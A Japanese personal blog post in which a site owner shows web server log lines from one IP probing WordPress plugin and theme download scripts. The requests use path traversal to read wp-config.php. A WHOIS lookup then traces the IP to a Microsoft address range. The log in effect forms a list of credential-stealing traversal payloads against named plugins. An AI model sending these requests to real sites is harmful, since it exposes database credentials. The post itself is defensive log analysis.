Microsoft から Web ページへの怪しいアクセス

Webページに怪しいアクセスが発生するのは毎度のことなので、ログ解析に邪魔な場合は、IPアドレスレンジ丸ごとファイヤーウォールでブロックしています。

本日も以下のような毎度の迷惑アクセスが発生していました。左から、行番号(ログには含まれない)、タイムスタンプ、IPアドレス、URL、リファラの順。

   557	[21/Aug/2016:04:55:29] - - 138.91.157.231    "GET //wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 404 1041       "-"
   558	[21/Aug/2016:04:55:30] - - 138.91.157.231    "GET //wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php HTTP/1.1" 404 1041       "-"
   559	[21/Aug/2016:04:55:30] - - 138.91.157.231    "GET //wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php HTTP/1.1" 404 1041       "-"
   560	[21/Aug/2016:04:55:31] - - 138.91.157.231    "GET //wp-content/themes/TheLoft/download.php?file=../../../wp-config.php HTTP/1.1" 404 1041       "-"
   561	[21/Aug/2016:04:55:32] - - 138.91.157.231    "GET //wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php HTTP/1.1" 404 1041       "-"
   562	[21/Aug/2016:04:55:32] - - 138.91.157.231    "GET //wp-content/themes/felis/download.php?file=../wp-config.php HTTP/1.1" 404 1041       "-"
   563	[21/Aug/2016:04:55:33] - - 138.91.157.231    "GET //wp-content/themes/epic/includes/download.php?file=wp-config.php HTTP/1.1" 404 1041       "-"
   564	[21/Aug/2016:04:55:33] - - 138.91.157.231    "GET //wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 404 1041       "-"
   565	[21/Aug/2016:04:55:34] - - 138.91.157.231    "GET //wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 404 1041       "-"
   566	[21/Aug/2016:04:55:34] - - 138.91.157.231    "GET //wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 404 1041       "-"
   567	[21/Aug/2016:04:55:35] - - 138.91.157.231    "GET //wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php HTTP/1.1" 404 1041       "-"
   568	[21/Aug/2016:04:55:35] - - 138.91.157.231    "GET //wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1" 404 1041       "-"
   569	[21/Aug/2016:04:55:36] - - 138.91.157.231    "GET //wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php HTTP/1.1" 404 1041       "-"
   570	[21/Aug/2016:04:55:36] - - 138.91.157.231    "GET //wp-content/themes/lote27/download.php?download=../../../wp-config.php HTTP/1.1" 404 1041       "-"
   571	[21/Aug/2016:04:55:36] - - 138.91.157.231    "GET //wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1" 404 1041       "-"
   572	[21/Aug/2016:04:55:37] - - 138.91.157.231    "GET //wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php HTTP/1.1" 404 1041       "-"
   573	[21/Aug/2016:04:55:37] - - 138.91.157.231    "GET //wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php HTTP/1.1" 404 1041       "-"
   574	[21/Aug/2016:04:55:38] - - 138.91.157.231    "GET //wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php HTTP/1.1" 404 1041       "-"
   575	[21/Aug/2016:04:55:39] - - 138.91.157.231    "GET //wp-content/plugins/history-collection/download.php?var=../../../wp-config.php HTTP/1.1" 404 1041       "-"
   576	[21/Aug/2016:04:55:39] - - 138.91.157.231    "GET //wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php HTTP/1.1" 404 1041       "-"
   577	[21/Aug/2016:04:55:39] - - 138.91.157.231    "GET //wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php HTTP/1.1" 404 1041       "-"
   578	[21/Aug/2016:04:55:40] - - 138.91.157.231    "GET //wp-content/force-download.php?file=../wp-config.php HTTP/1.1" 404 1041       "-"
   579	[21/Aug/2016:04:55:40] - - 138.91.157.231    "GET //wp-content/plugins/ibs-mappro/lib/download.php?file=../../../../wp-config.php HTTP/1.1" 404 1041       "-"
   580	[21/Aug/2016:04:55:40] - - 138.91.157.231    "GET //wp-content/themes/SMWF/inc/download.php?file=../wp-config.php HTTP/1.1" 404 1041       "-"
   581	[21/Aug/2016:04:55:41] - - 138.91.157.231    "GET //force-download.php?file=../wp-config.php HTTP/1.1" 404 1041       "-"
   582	[21/Aug/2016:04:55:41] - - 138.91.157.231    "GET //wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr HTTP/1.1" 404 1041       "-"
   583	[21/Aug/2016:04:55:41] - - 138.91.157.231    "GET //wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php HTTP/1.1" 404 1041       "-"
   584	[21/Aug/2016:04:55:42] - - 138.91.157.231    "GET //wp-content/themes/markant/download.php?file=../../wp-config.php HTTP/1.1" 404 1041       "-"
   585	[21/Aug/2016:04:55:42] - - 138.91.157.231    "GET //wp-content/themes/yakimabait/download.php?file=./wp-config.php HTTP/1.1" 404 1041       "-"
   586	[21/Aug/2016:04:55:43] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 301 -       "-"
   587	[21/Aug/2016:04:55:47] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 404 50776       "-"
   588	[21/Aug/2016:04:55:52] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php HTTP/1.1" 301 -       "-"
   589	[21/Aug/2016:04:55:55] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php HTTP/1.1" 404 50776       "-"
   590	[21/Aug/2016:04:55:59] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php HTTP/1.1" 301 -       "-"
   591	[21/Aug/2016:04:56:01] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/contus-video-gallery/hdflvplayer/download.php?f=../../../../wp-config.php HTTP/1.1" 404 50776       "-"
   592	[21/Aug/2016:04:56:05] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/TheLoft/download.php?file=../../../wp-config.php HTTP/1.1" 301 -       "-"
   593	[21/Aug/2016:04:56:07] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php HTTP/1.1" 404 50776       "-"
   594	[21/Aug/2016:04:56:12] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/felis/download.php?file=../wp-config.php HTTP/1.1" 301 -       "-"
   595	[21/Aug/2016:04:56:14] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/felis/download.php?file=../wp-config.php HTTP/1.1" 404 50776       "-"
   596	[21/Aug/2016:04:56:18] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php HTTP/1.1" 301 -       "-"
   597	[21/Aug/2016:04:56:21] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php HTTP/1.1" 404 50776       "-"
   598	[21/Aug/2016:04:56:25] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 301 -       "-"
   599	[21/Aug/2016:04:56:27] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 404 50776       "-"
   600	[21/Aug/2016:04:56:31] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/epic/includes/download.php?file=wp-config.php HTTP/1.1" 301 -       "-"
   601	[21/Aug/2016:04:56:33] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/epic/includes/download.php?file=wp-config.php HTTP/1.1" 404 50776       "-"
   602	[21/Aug/2016:04:56:45] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 301 -       "-"
   603	[21/Aug/2016:04:56:47] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 404 50776       "-"
   604	[21/Aug/2016:04:56:51] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 301 -       "-"
   605	[21/Aug/2016:04:56:54] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php HTTP/1.1" 404 50776       "-"
   606	[21/Aug/2016:04:56:58] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php HTTP/1.1" 301 -       "-"
   607	[21/Aug/2016:04:57:00] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php HTTP/1.1" 404 50776       "-"
   608	[21/Aug/2016:04:57:09] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1" 301 -       "-"
   609	[21/Aug/2016:04:57:11] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php HTTP/1.1" 404 50776       "-"
   610	[21/Aug/2016:04:57:15] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/lote27/download.php?download=../../../wp-config.php HTTP/1.1" 301 -       "-"
   611	[21/Aug/2016:04:57:18] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/lote27/download.php?download=../../../wp-config.php HTTP/1.1" 404 50776       "-"
   612	[21/Aug/2016:04:57:22] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1" 301 -       "-"
   613	[21/Aug/2016:04:57:24] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1" 404 50776       "-"
   614	[21/Aug/2016:04:57:28] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php HTTP/1.1" 301 -       "-"
   615	[21/Aug/2016:04:57:31] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php HTTP/1.1" 404 50776       "-"
   616	[21/Aug/2016:04:57:35] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php HTTP/1.1" 301 -       "-"
   617	[21/Aug/2016:04:57:37] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php HTTP/1.1" 404 50776       "-"
   618	[21/Aug/2016:04:57:41] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php HTTP/1.1" 301 -       "-"
   619	[21/Aug/2016:04:57:46] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php HTTP/1.1" 404 50776       "-"
   620	[21/Aug/2016:04:57:50] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php HTTP/1.1" 301 -       "-"
   621	[21/Aug/2016:04:57:52] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php HTTP/1.1" 404 50776       "-"
   622	[21/Aug/2016:04:57:56] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php HTTP/1.1" 301 -       "-"
   623	[21/Aug/2016:04:57:59] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php HTTP/1.1" 404 50776       "-"
   624	[21/Aug/2016:04:58:03] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php HTTP/1.1" 301 -       "-"
   625	[21/Aug/2016:04:58:05] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php HTTP/1.1" 404 50776       "-"
   626	[21/Aug/2016:04:58:09] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/history-collection/download.php?var=../../../wp-config.php HTTP/1.1" 301 -       "-"
   627	[21/Aug/2016:04:58:12] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php HTTP/1.1" 404 50776       "-"
   628	[21/Aug/2016:04:58:15] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/SMWF/inc/download.php?file=../wp-config.php HTTP/1.1" 301 -       "-"
   629	[21/Aug/2016:04:58:18] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php HTTP/1.1" 404 50776       "-"
   630	[21/Aug/2016:04:58:22] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/force-download.php?file=../wp-config.php HTTP/1.1" 301 -       "-"
   631	[21/Aug/2016:04:58:24] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/force-download.php?file=../wp-config.php HTTP/1.1" 404 50776       "-"
   632	[21/Aug/2016:04:58:28] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/ibs-mappro/lib/download.php?file=../../../../wp-config.php HTTP/1.1" 301 -       "-"
   633	[21/Aug/2016:04:58:31] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/ibs-mappro/lib/download.php?file=../../../../wp-config.php HTTP/1.1" 404 50776       "-"
   634	[21/Aug/2016:04:58:35] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//force-download.php?file=../wp-config.php HTTP/1.1" 301 -       "-"
   635	[21/Aug/2016:04:58:43] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/force-download.php?file=../wp-config.php HTTP/1.1" 404 50776       "-"
   636	[21/Aug/2016:04:58:48] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr HTTP/1.1" 301 -       "-"
   637	[21/Aug/2016:04:58:51] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr HTTP/1.1" 404 50776       "-"
   638	[21/Aug/2016:04:58:55] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php HTTP/1.1" 301 -       "-"
   639	[21/Aug/2016:04:58:57] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?path=../../../../../../../wp-config.php HTTP/1.1" 404 50776       "-"
   640	[21/Aug/2016:04:59:02] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/markant/download.php?file=../../wp-config.php HTTP/1.1" 301 -       "-"
   641	[21/Aug/2016:04:59:05] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/markant/download.php?file=../../wp-config.php HTTP/1.1" 404 50776       "-"
   642	[21/Aug/2016:04:59:09] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access//wp-content/themes/yakimabait/download.php?file=./wp-config.php HTTP/1.1" 301 -       "-"
   643	[21/Aug/2016:04:59:11] - - 138.91.157.231    "GET /notes/2012/12/02/wordpress-xmlrpc-php-post-access/wp-content/themes/yakimabait/download.php?file=./wp-config.php HTTP/1.1" 404 50776       "-"

この「138.91.157.231」がどこの国のIPなのかを調べてみると・・・・

NetRange:       138.91.0.0 - 138.91.255.255
CIDR:           138.91.0.0/16
NetName:        MICROSOFT
NetHandle:      NET-138-91-0-0-1
Parent:         NET138 (NET-138-0-0-0-0)
NetType:        Direct Assignment
OriginAS:
Organization:   Microsoft Corp (MSFT-Z)
RegDate:        2011-06-22
Updated:        2013-08-20
Ref:            https://whois.arin.net/rest/net/NET-138-91-0-0-1

マイクロソフトでした。

マイクロソフトが企業としてこんな事しているとは思いませんけど、中にはこういう事をする奴がいるわけです。IPアドレスレンジを貸与している関連の企業や顧客かもしれませんけどね。

abuse へ連絡しようかとも考えましたけど、こういう企業は Thank you の一言も返信してこないのが常なので、レポートはパス。ここで、さらすだけにします。

コメントを残す